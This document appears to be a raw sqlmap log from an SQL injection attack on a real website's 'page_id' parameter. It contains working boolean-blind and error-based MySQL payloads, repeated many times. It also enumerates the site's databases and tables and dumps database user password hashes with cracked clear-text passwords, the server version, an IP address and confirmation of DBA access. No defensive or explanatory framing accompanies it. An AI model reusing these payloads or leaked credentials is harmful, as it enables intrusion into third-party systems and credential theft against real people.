# # ## ## # # # ##### # ##### # ###### # # #### ##### # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ##### ## # # # # # # # # # # # ##### # # ## # # ##### # # # # # # # # # # # # # # # # # # #### ###### # # # ###### ###### # # #### # # sqlmap identified the following injection points with a total of 28 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- available databases [9]: [*] information_schema [*] mysql [*] orcataco_bumperstic [*] orcataco_officerjones [*] orcataco_officerjones_1 [*] orcataco_officerjones_2 [*] orcataco_snap [*] signedbump [*] test sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- Database: mysql [17 tables] +---------------------------+ | columns_priv | | db | | func | | help_category | | help_keyword | | help_relation | | help_topic | | host | | proc | | procs_priv | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | +---------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- available databases [9]: [*] information_schema [*] mysql [*] orcataco_bumperstic [*] orcataco_officerjones [*] orcataco_officerjones_1 [*] orcataco_officerjones_2 [*] orcataco_snap [*] signedbump [*] test sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- Database: orcataco_bumperstic [113 tables] +--------------------------+ | _settings | | bank | | basket_items | | basket_orders | | basket_tags | | baskets | | brands | | bsuids | | categories | | clickemail | | clickwizard | | comment | | counters | | counters_i12 | | counters_i24 | | counters_o12 | | counters_o24 | | emailsendlog | | favorite_orders | | feedback | | game | | game_score | | hm_events | | hm_message_queue | | invited | | invited_from_force | | item_book | | item_tags | | items | | line_items | | logadd | | logcontacts | | loggiftclick | | logimport | | loginvite | | loginvited | | logvalidate | | logwizard | | motd | | notified | | notify_off | | occasions | | orders | | orders_non_facebook | | page_items | | played | | post_install_items | | post_install_items_v2 | | profile_settings | | public_pages | | publish_stream_sgnonpred | | purchase | | quicksender | | recent_users | | reply_from_hist | | requests_sent | | rpd_by_day | | sendqueue | | sendsthisweek | | sendsthisweek2 | | sent | | settings | | stream_posts | | survey_answers | | survey_questions | | tag_stats | | tags | | temp_birthday_orders | | temp_click_events | | temp_daily_stats | | temp_despicable_me | | temp_funnel_test_orders | | temp_hourly_stats | | temp_invite_stats | | temp_invite_stats_v2 | | temp_item_recs2 | | temp_nectar_ads | | temp_nectar_stats_v2 | | temp_order_clicks | | temp_page_counter | | temp_page_visits | | temp_premium_orders | | temp_request_demo_stats | | temp_request_stats | | temp_retention_daily | | temp_retention_weekly | | temp_sendgroup_members | | temp_sendgroup_sends | | temp_test_order_users | | temp_test_orders | | temp_tutorial_stages | | temp_user_credits | | temp_userbase | | theme_tag_map | | theme_tags | | themes | | themes_user_gen | | transactions | | uids | | unlocked | | unopened | | unsent | | unsubscribe | | user_country | | user_groups | | user_items | | user_pages | | user_pageviews | | user_pageviews_v2 | | user_themes | | userbase | | winner | | wishlist | +--------------------------+ Database: test [21 tables] +------------------------+ | TempTable | | appinfo | | autoincr | | cur | | deals | | errorcounts | | errorfromfirst1000 | | install_metrics | | installs_by_day | | installs_by_invite_day | | invited_from_force | | invites_by_day | | invites_by_newuser_day | | ret_users2 | | retlog | | rpdbyda | | send_log | | uids | | user_country | | x | | y | +------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- Database: test [21 tables] +------------------------+ | TempTable | | appinfo | | autoincr | | cur | | deals | | errorcounts | | errorfromfirst1000 | | install_metrics | | installs_by_day | | installs_by_invite_day | | invited_from_force | | invites_by_day | | invites_by_newuser_day | | ret_users2 | | retlog | | rpdbyda | | send_log | | uids | | user_country | | x | | y | +------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- Database: orcataco_bumperstic [113 tables] +--------------------------+ | _settings | | bank | | basket_items | | basket_orders | | basket_tags | | baskets | | brands | | bsuids | | categories | | clickemail | | clickwizard | | comment | | counters | | counters_i12 | | counters_i24 | | counters_o12 | | counters_o24 | | emailsendlog | | favorite_orders | | feedback | | game | | game_score | | hm_events | | hm_message_queue | | invited | | invited_from_force | | item_book | | item_tags | | items | | line_items | | logadd | | logcontacts | | loggiftclick | | logimport | | loginvite | | loginvited | | logvalidate | | logwizard | | motd | | notified | | notify_off | | occasions | | orders | | orders_non_facebook | | page_items | | played | | post_install_items | | post_install_items_v2 | | profile_settings | | public_pages | | publish_stream_sgnonpred | | purchase | | quicksender | | recent_users | | reply_from_hist | | requests_sent | | rpd_by_day | | sendqueue | | sendsthisweek | | sendsthisweek2 | | sent | | settings | | stream_posts | | survey_answers | | survey_questions | | tag_stats | | tags | | temp_birthday_orders | | temp_click_events | | temp_daily_stats | | temp_despicable_me | | temp_funnel_test_orders | | temp_hourly_stats | | temp_invite_stats | | temp_invite_stats_v2 | | temp_item_recs2 | | temp_nectar_ads | | temp_nectar_stats_v2 | | temp_order_clicks | | temp_page_counter | | temp_page_visits | | temp_premium_orders | | temp_request_demo_stats | | temp_request_stats | | temp_retention_daily | | temp_retention_weekly | | temp_sendgroup_members | | temp_sendgroup_sends | | temp_test_order_users | | temp_test_orders | | temp_tutorial_stages | | temp_user_credits | | temp_userbase | | theme_tag_map | | theme_tags | | themes | | themes_user_gen | | transactions | | uids | | unlocked | | unopened | | unsent | | unsubscribe | | user_country | | user_groups | | user_items | | user_pages | | user_pageviews | | user_pageviews_v2 | | user_themes | | userbase | | winner | | wishlist | +--------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- Database: orcataco_bumperstic [113 tables] +--------------------------+ | _settings | | bank | | basket_items | | basket_orders | | basket_tags | | baskets | | brands | | bsuids | | categories | | clickemail | | clickwizard | | comment | | counters | | counters_i12 | | counters_i24 | | counters_o12 | | counters_o24 | | emailsendlog | | favorite_orders | | feedback | | game | | game_score | | hm_events | | hm_message_queue | | invited | | invited_from_force | | item_book | | item_tags | | items | | line_items | | logadd | | logcontacts | | loggiftclick | | logimport | | loginvite | | loginvited | | logvalidate | | logwizard | | motd | | notified | | notify_off | | occasions | | orders | | orders_non_facebook | | page_items | | played | | post_install_items | | post_install_items_v2 | | profile_settings | | public_pages | | publish_stream_sgnonpred | | purchase | | quicksender | | recent_users | | reply_from_hist | | requests_sent | | rpd_by_day | | sendqueue | | sendsthisweek | | sendsthisweek2 | | sent | | settings | | stream_posts | | survey_answers | | survey_questions | | tag_stats | | tags | | temp_birthday_orders | | temp_click_events | | temp_daily_stats | | temp_despicable_me | | temp_funnel_test_orders | | temp_hourly_stats | | temp_invite_stats | | temp_invite_stats_v2 | | temp_item_recs2 | | temp_nectar_ads | | temp_nectar_stats_v2 | | temp_order_clicks | | temp_page_counter | | temp_page_visits | | temp_premium_orders | | temp_request_demo_stats | | temp_request_stats | | temp_retention_daily | | temp_retention_weekly | | temp_sendgroup_members | | temp_sendgroup_sends | | temp_test_order_users | | temp_test_orders | | temp_tutorial_stages | | temp_user_credits | | temp_userbase | | theme_tag_map | | theme_tags | | themes | | themes_user_gen | | transactions | | uids | | unlocked | | unopened | | unsent | | unsubscribe | | user_country | | user_groups | | user_items | | user_pages | | user_pageviews | | user_pageviews_v2 | | user_themes | | userbase | | winner | | wishlist | +--------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- Database: orcataco_bumperstic [113 tables] +--------------------------+ | _settings | | bank | | basket_items | | basket_orders | | basket_tags | | baskets | | brands | | bsuids | | categories | | clickemail | | clickwizard | | comment | | counters | | counters_i12 | | counters_i24 | | counters_o12 | | counters_o24 | | emailsendlog | | favorite_orders | | feedback | | game | | game_score | | hm_events | | hm_message_queue | | invited | | invited_from_force | | item_book | | item_tags | | items | | line_items | | logadd | | logcontacts | | loggiftclick | | logimport | | loginvite | | loginvited | | logvalidate | | logwizard | | motd | | notified | | notify_off | | occasions | | orders | | orders_non_facebook | | page_items | | played | | post_install_items | | post_install_items_v2 | | profile_settings | | public_pages | | publish_stream_sgnonpred | | purchase | | quicksender | | recent_users | | reply_from_hist | | requests_sent | | rpd_by_day | | sendqueue | | sendsthisweek | | sendsthisweek2 | | sent | | settings | | stream_posts | | survey_answers | | survey_questions | | tag_stats | | tags | | temp_birthday_orders | | temp_click_events | | temp_daily_stats | | temp_despicable_me | | temp_funnel_test_orders | | temp_hourly_stats | | temp_invite_stats | | temp_invite_stats_v2 | | temp_item_recs2 | | temp_nectar_ads | | temp_nectar_stats_v2 | | temp_order_clicks | | temp_page_counter | | temp_page_visits | | temp_premium_orders | | temp_request_demo_stats | | temp_request_stats | | temp_retention_daily | | temp_retention_weekly | | temp_sendgroup_members | | temp_sendgroup_sends | | temp_test_order_users | | temp_test_orders | | temp_tutorial_stages | | temp_user_credits | | temp_userbase | | theme_tag_map | | theme_tags | | themes | | themes_user_gen | | transactions | | uids | | unlocked | | unopened | | unsent | | unsubscribe | | user_country | | user_groups | | user_items | | user_pages | | user_pageviews | | user_pageviews_v2 | | user_themes | | userbase | | winner | | wishlist | +--------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- help [1]: wget txt [1]: ? [1]: sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- database management system users password hashes: [*] karen [2]: password hash: 1c00fc2b05570f2f password hash: 248036c235f60aa8 [*] nujeplies [1]: password hash: NULL [*] root [5]: password hash: 248036c235f60aa8 password hash: 248036c235f60aa8 password hash: 4fc67fc309a271b8 clear-text password: karen clear-text password: karen password hash: 4fc67fc309a271b8 clear-text password: karen clear-text password: karen password hash: NULL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=28167956 AND 1228=1228 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- banner: '5.0.45-log' current user: 'root@208.43.165.226' current database: 'orcataco_bumperstic' current user is DBA: 'True'